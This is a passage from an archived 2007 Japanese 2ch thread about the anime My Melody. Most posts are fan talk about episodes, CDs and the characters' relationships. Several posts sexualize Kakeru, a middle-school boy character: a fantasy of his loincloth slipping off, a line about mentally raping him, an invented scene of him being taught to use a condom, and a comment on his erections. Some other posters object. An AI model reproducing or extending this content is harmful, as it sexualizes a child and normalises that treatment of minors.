潤きゅんが母親の事を「おふくろ」と言っていたのと
対照的だ。
駆きゅんも潤きゅんみたいに男らしく裸で、寝て欲しいな。

147 :名無しさん@お腹いっぱい。:2007/11/23(金) 04:44:47 ID:Jk3GQo5R
駆なら今、隣で裸で寝てるがね・・・

148 :名無しさん@お腹いっぱい。:2007/11/23(金) 06:19:54 ID:RSUWaLf+
>>146
※参考
歌:おかあさん
美紀:ママ
真菜:おかん
女の子も母親の呼び方が各々異なる

話は逸れるが、駆はかあちゃんに数学45点の答案を廊下で見られたが
駆の部屋は廊下側の北向き?

149 :名無しさん@お腹いっぱい。:2007/11/23(金) 12:05:04 ID:je13xz65
>>148

方角は不明だが、駆きゅんの部屋は、なぜかマンションの廊下側なのに、
窓があるという特異なつくりだ。

駆きゅん、45点てめちゃくちゃ悪いわけじゃないな。
本当に勉強ができなかったら10点とかだし。
やっぱり、中学入るまでの二、三年間は、暗い受験戦争を戦ったのかな?
その後、遊びにうつつを抜かして・・・
駆きゅんの体が小さいのも受験戦争の時に、毎日夜中の二時、三時まで
受験勉強をしていた生活環境とストレスが原因かも。
その割りに短距離が、早いのは唯一心の休まる体育の時間に、おもいっきり
体を動かしていたからかな?
もしそうだとしても、なぜか萌えてしまう。

これて歪んだ愛なのかな?

150 :名無しさん@お腹いっぱい。:2007/11/23(金) 14:29:48 ID:b/llWd3B
そろそろドン引きしていいかな…

151 :名無しさん@お腹いっぱい。:2007/11/23(金) 15:57:11 ID:MX2fAh1V
明後日は出てくるのかな。
どちらにしても外出するからリアルタイムでは見れねぇ・・・

152 :名無しさん@お腹いっぱい。:2007/11/23(金) 16:03:04 ID:Ys4gHUsv
予告には出てたからでるのは確実だよ。
子ヤギ姿がプリチー。

153 :名無しさん@お腹いっぱい。:2007/11/23(金) 20:41:51 ID:RSUWaLf+
女の子と遊ぶことの恥ずかしさはほとんどなくなってるだろう
3人ともノーマルの女の子からは遠いからこそ馴染めたのかもしれんが

やっぱ接点は気になる
少なくとも歌が駆をよく思っていなかったのは確実
で、駆は無意識に歌を気に入ってた…
で、真菜は転入生で、美紀との接点が見い出しにくい…
美紀と駆がいいフレンドだったような気もしてくる

154 :名無しさん@お腹いっぱい。:2007/11/23(金) 20:42:03 ID:9S5qk/oC
恥ずかしがるところが見たい、

155 :名無しさん@お腹いっぱい。:2007/11/23(金) 23:08:43 ID:YIe6qJLp
歩きゅん達と歌達とどっちが、遊ぶ頻度多いんだろ?

156 :名無しさん@お腹いっぱい。:2007/11/24(土) 10:13:05 ID:Ct9TxABC
なんか落ちそうな悪寒

157 :名無しさん@お腹いっぱい。:2007/11/24(土) 10:17:36 ID:lzPc3Div
落とさんぞ〜

158 :名無しさん@お腹いっぱい。:2007/11/24(土) 13:57:12 ID:mfsy4qy9
小暮きゅんあげ

159 :名無しさん@お腹いっぱい。:2007/11/24(土) 17:27:50 ID:OZE6SOx8
子山羊駆に期待アゲ

160 :名無しさん@お腹いっぱい。:2007/11/25(日) 14:31:32 ID:SEwkaao0
かわいすぎだろw
さすが前のとき真菜に殴られただけのことはあるな

161 :名無しさん@お腹いっぱい。:2007/11/25(日) 18:12:31 ID:ZvaVeRAN
http://nov.2chan.net/24/src/1195950937718.jpg
http://nov.2chan.net/24/src/1195951100092.jpg
http://nov.2chan.net/24/src/1195951124686.jpg
子ヤギ可愛すぎるだろ‥(;´Д`)ハァハァ
http://nov.2chan.net/24/src/1195950823342.jpg
ちょっと背伸びたかな?

162 :名無しさん@自治スレでローカルルール変更議論中:2007/11/25(日) 18:53:20 ID:M1x17ba3
>>161

可愛いのありがとうございます。

一番下の画像は、駆きゅんシークレットブーツ履いているじゃないの?
靴の底が厚そうだし。

163 :名無しさん@自治スレでローカルルール変更議論中:2007/11/25(日) 20:17:44 ID:1jbFTfDA
何故か冒頭、潤が女の子+駆に「いぇい、お姉ちゃんたち〜」って声かけてたな。
不思議だ。

164 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 00:03:04 ID:ZvaVeRAN
声がいつもより高めでカワユス

165 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 11:32:35 ID:SZhNrN/D
駆きゅんも女の子扱いなんだな

166 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 15:42:06 ID:xE2nXJck
>>161
歌ちゃんとの背のバランスがちょうどいいな
またデートを見せてくれ〜

167 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 22:31:10 ID:M3CyGxbL
可愛い駆もいいがそろそろ凛々しい駆が欲しいな。せっかく背も伸びたし。

それともスタッフはこのまま駆をヒロインにするつもりなのか。

168 :名無しさん@自治スレでローカルルール変更議論中:2007/11/26(月) 22:37:42 ID:E7RVcmaM
プニプニで可愛い駆きゅんが、男らしい事をして欲しいな。

日本独自の神事や武道とか。

169 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 00:19:13 ID:7XrsH1dz
ふんどし一丁で神輿担いでいる所とか?
確かにそれはそれで見てみたい‥。
今年の正月はどうくるかな。

170 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 00:33:30 ID:5tyDxN/p
まあ少なくとも御輿をふんどし一丁は無いかと。

大方歌ちゃんとデートか女の子にまじって初詣かな。
個人的には久しぶりに照れる駆が見たいのでデート希望。

171 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 04:39:18 ID:9Y6z++Vm
>>170

駆きゅん達男子が、学校行事の一環でふんどし一丁で滝に打たれて、
精神鍛錬をするとか。
(歩きゅんや博明きゅんのふんどし姿も見れるし。)
あるいはふんどし一丁で寒中水泳とか。
そして歌達が応援に来てふんどし姿を、見られて照れる展開とかがイイナ。
そしてふんどしが緩んで・・・
そうしたら目茶苦茶、恥ずかしがる駆きゅんが。

172 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 07:06:39 ID:21etHrXy
>>171
それはねぇよry

173 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 09:35:32 ID:5tyDxN/p
>>171
さすがにそれやったら怒られるだろ。
只でさえ露出が多いアニメなのに。

174 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 09:57:53 ID:J5Beq+cF
身長が伸びても女の子化が一層進行してる
もはや後戻りできそうになさそうだ
女の子と一緒に遊ぶ設定の方が都合がいいんだろうか

175 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 12:23:02 ID:9Y6z++Vm
>>173

テレビ東京の某マフィアアニメで、主人公の中学生男子が、
ふんどし一丁で岩にくくり付けられて滝に打たれてたシーンが、
あったからふんどし姿は大丈夫だろう。
何は、アングルや太股、手で隠せばどうにかなると思う。

>>174

時間が短くなったから男友達と一緒のシーンが、出せないのかな?
以前はあったのに。

ふんどし一丁で寒中水泳とかだと男同士の友情とか、
強調されて歌が入り込む空きがなくて嫉妬するとか、
して欲しいな。
出来れば、プニプニで可愛い駆きゅんがイイナ。

176 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 13:23:23 ID:fSwsY6GG
マジレスすると痛い

177 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 14:24:00 ID:OKzydbPT
空気読んで自重した方が
それに本編無関係な妄想するならせめて笑えるものにして欲しいよ

178 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 16:06:03 ID:NkP9YrBC
断る! 空気など無い! 幻想だ!

179 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 19:27:27 ID:fSwsY6GG
>>178
このスレを幻想郷と申すか

180 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 20:08:32 ID:Ebn72GuH
毎日頭の中で駆キュンを犯してますが何か?

181 :名無しさん@自治スレでローカルルール変更議論中:2007/11/27(火) 21:46:08 ID:zgYmmvwX
駆きゅんは罪深いな。

182 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 01:20:30 ID:l7zQ1r6A
先週は微笑ましかったな。
確かにビジュアルも萌えるが個人的には歌ちゃんの隣を常にキープしてる小暮にニヤニヤした。


>>180
脳内だけにしとけよ。


183 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 05:16:54 ID:Ab/fVcRW
並んで芋食ってたな
間にマイメロ座ってたけどw

184 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 06:37:38 ID:zfugSR80
私服姿で一緒に芋を食べてたらもっと女の子同士に見えただろう
以前のやんちゃさが薄まって女の子らしいやさしさが顕著に表れてきたようだ

185 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 07:36:43 ID:KJlsWTME
そのうち一人称が僕になるかな?
そしてさらには・・・

186 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 08:24:46 ID:yuVsdsvA
>>184
>私服姿で一緒に芋を食べてたらもっと女の子同士に見えただろう

いくらなんでもそれはないw





187 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 09:40:56 ID:5kFzyHwy
小暮は余裕が出てきたな。以前とは大違いだ。
もっともデートのときはまだまだいっぱいいっぱいだがw

188 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 12:33:39 ID:KJlsWTME
そのうち歌に対して甘えが出て、歌とケンカするかな?

189 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 14:27:04 ID:l7zQ1r6A
>>187
「男の子はね、気付いたら大人になっているものなのよ」ってママが言ってたわ♪

190 :名無しさん@自治スレでローカルルール変更議論中:2007/11/28(水) 22:50:51 ID:OGyTZN9+
お腹が鳴って赤くなる駆カワユス

191 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 02:27:02 ID:mype9sDu
コンドームの着け方を歌に教わってるんだろう

192 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 03:46:28 ID:FaIJFTxP
>>191
「こ、こうでいいのか…?」
「違うよ…ほら、向きが逆になってる…」
「あ、そ、そっか…」
「じゃあ、準備できたね…」
「あ、ああ…」


誰か俺を殴ってくれ

193 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 07:23:51 ID:ieaDwtih
>>191

その前に駆きゅんてまだ立たないんじゃないの?

194 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 08:22:02 ID:Hco5Vmkd
椅子に座ったときの足を開く幅が狭くなってないか?
あれで膝の上にマイメロが乗ってたら…

195 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 09:40:44 ID:Jpw8eva7
>>193
そんなもん各自の妄想でなんとでもなる
強調すんな

196 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 22:34:32 ID:iI/yKgrc
駆きゅんが歌ちゃんと万が一結婚したら夢野駆になるのか。
KYになるわけだな。

197 :名無しさん@自治スレでローカルルール変更議論中:2007/11/29(木) 23:53:34 ID:qN31q4pt
夢野駆てかこいいな
もう婿入りするしかないな

198 :名無しさん@自治スレでローカルルール変更議論中:2007/11/30(金) 04:35:45 ID:YwbszNOY
今から同居したらいいのに。
夢野三姉妹に囲まれて、ますます女の子ぽくなるかも。
そして、ゲイバーや演劇の女形からスカウトが・・・

199 :名無しさん@自治スレでローカルルール変更議論中:2007/11/30(金) 20:58:20 ID:EPwgFOo5
明後日は小暮は出そうにもないな。


200 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 04:07:00 ID:1ZLJQhpF
chuのCDジャケットかわええのう

201 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 07:41:43 ID:S64Q4CVV
>>200

どっち盤が駆歌なんだっけ?
昨日CDショップ行ったけど無かったよ……ウサミミ仮面はあったのに。

絵はどんな感じ?

202 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 11:57:14 ID:27C9PRyO
むしろいつ発売だっけ?

203 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 14:32:47 ID:9mmDIQOj
>>201
珍しい
歌&駆はA盤ことナナ盤でそっちが残ってる店が断然多い
変態のカナ盤は残り少ない

夢野駆になったらかあちゃんの面倒見る輩がいなくなるぞ
父親存在は不明だが一人っ子なのは確実だろうし

204 :201:2007/12/01(土) 15:42:28 ID:S64Q4CVV
>>203

ありがとう(^^)
今尼で買うか悩んでる。
ジャケットが見たいだけなんだが売って無いから尼で買うかどうか悩んでる。


205 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 16:12:01 ID:lbKgUW5K
駆きゅんの写真集って何時発売になったんだっけ?

206 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 16:56:19 ID:tmkJwBug
>>203
結婚の形態と親の面倒は無関係
あくまで当事者間の意思次第
まあ現実の話してもしょうがないんだけどね

207 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 17:09:55 ID:Nb51tprW
>>203

駆きゅんの母ちゃんには、気の毒だが老人ホームに入ってもらおう。

でも、心優しい駆きゅんだから、両親引き取るんじゃないか。
最終的には、歌達の家を増築して同居とか。

208 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 18:33:05 ID:27C9PRyO
新OPミツカラナス

Q.売り切れ
A.入荷してない

マジ田舎サミシス

209 :名無しさん@自治スレでローカルルール変更議論中:2007/12/01(土) 21:20:14 ID:ctTkkPd0
>>208
つYouTube

210 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 03:43:13 ID:ZACD90iR
>>203

駆ママが駆きゅんの養子になればいいじゃないか

211 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 06:25:42 ID:9yeA682k
>>210

それは無理。
でも、駆きゅんの母ちゃんが、歌の父親の養女になればいい。

212 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 10:12:38 ID:9yeA682k
来週が楽しみだ。
予告の男の試練七番勝負の内容が気になるな。
ムフフフ・・・

213 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 10:22:14 ID:ABc3Lpvn
    ∧_∧  / ̄ ̄ ̄ ̄ ̄
  [( ・∀・)< これは堪らん、次回始まるまで寝る
| ̄ ̄ ̄ ̄ ̄ ̄ \_____
|  | ̄ ̄ ̄ ̄|  |
|  |  @  @|  |
|  |@  @  |  |
|  |____|  |
|________|

214 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 10:30:02 ID:STTEuXzT
実況から拾ってきた。
ttp://tv.be-to.com/jlab-live/s/89331.jpg
ttp://tvde.web.infoseek.co.jp/cgi-bin/jlab-dat/s/128945.jpg

215 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 10:41:02 ID:9rMvH+9w
さて予約予約(´∀`)

216 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 11:48:58 ID:9yeA682k
来週の七番勝負に相撲があったらイイナ。
相撲は、前に変態と柿崎との勝負の時にも出てきたから可能性高そう。

217 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 12:53:10 ID:ZACD90iR
七番ってこんな感じか?

料理
洗濯
ダジャレ
相撲
レスリング
プロレス
トライアスロン


218 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 13:06:17 ID:9yeA682k
>>217

後、寒中水泳も。
格好はもちろん・・・

219 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 14:35:51 ID:9rMvH+9w
久しぶりに陸部アピールが見たい。

雅彦「男ならかけっこで勝負だああ!」
駆「あの……でも俺……」
歌「駆陸上部なんだから勝てるわけないでしょー!」


………まあ期待してないけど。

220 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 16:53:02 ID:4e4A/zs+
かなり滅茶苦茶な競技もあると予想

221 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 22:08:25 ID:xMo8eaDE
オムライスとな!? 
うらやましー

222 :名無しさん@自治スレでローカルルール変更議論中:2007/12/02(日) 22:46:49 ID:9yeA682k
すでに通い婚なのかな。
でも、まだ歌が駆きゅんの部屋に上がり込むシーンて、まだ無いね。

223 :名無しさん@お腹いっぱい。:2007/12/03(月) 00:37:09 ID:Sr0QIU2h
「萌えたよ、萌え尽きたよ、真っ白な灰に・・・」

224 :名無しさん@お腹いっぱい。:2007/12/03(月) 06:11:06 ID:M7bqyljQ
駆「>>223………(はっ)>>223ーーーっ………!!」

225 :名無しさん@お腹いっぱい。:2007/12/03(月) 08:47:42 ID:4JaGa/VJ
歌が小暮家に一度も行ってないのはワケアリ?
かあちゃんに可愛がってもらえばいいのに

226 :名無しさん@お腹いっぱい。:2007/12/03(月) 11:22:23 ID:f6cZ3sMU
自分の部屋のあんなのやこんなのを見られるのが恥ずかしいんだろ
マジレスすると尺の都合ry

227 :名無しさん@お腹いっぱい。:2007/12/03(月) 11:49:38 ID:lZEYIc3n
歌が駆きゅんの部屋に入ったらどうなるんだろう。
駆きゅんが歌に見られて困る物とかあるのかな?

228 :名無しさん@お腹いっぱい。:2007/12/03(月) 11:50:42 ID:lZEYIc3n
歌が駆きゅんの部屋に入ったらどうなるんだろう。
駆きゅんが歌に見られて困る物とかあるのかな?
それか歌が陸上部の部室に押しかけるとか。

229 :名無しさん@お腹いっぱい。:2007/12/04(火) 00:35:12 ID:5YqSXjge
来週ちょー楽しみ

230 :名無しさん@お腹いっぱい。:2007/12/04(火) 11:52:24 ID:D3Y2tJfx
歌ちゃんの家に行ってオムライス食べるとか……
きっと一期では誰も予想しなかっただろうな。
これも小暮の頑張りの成果だな。
1サブキャラからヒロインの相手役を勝ち取った小暮に改めてお前は男だと言いたい。

231 :名無しさん@お腹いっぱい。:2007/12/04(火) 14:49:43 ID:ZmahU6Kv
小暮って最初はちょいキャラだったよね。今よりショタカワイイ感じだったけど。
監督が脚本途中でいじったのかな?割と後半のほうからメインになってきたよね。
一期のころは集合してる絵とかにもいなかったし。エンディングのスタッフロールでも
後のほうだったしね。

232 :名無しさん@お腹いっぱい。:2007/12/04(火) 17:06:08 ID:6Pr8/4bn
自分がマイメロ見出したのは、駆きゅんと博明きゅんが、出ていたからだ。
始め駆きゅんと博明きゅんを見た時に、何このショタコン狙い撃ちの
キャラはて思った。
でも、前半駆きゅんの出番少なかったね。
始めは、まだ色々決っていなかったのかな。
駆きゅんがヒロインになれたのは、江夏とかいう脚本家のお陰なのかな?

50 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)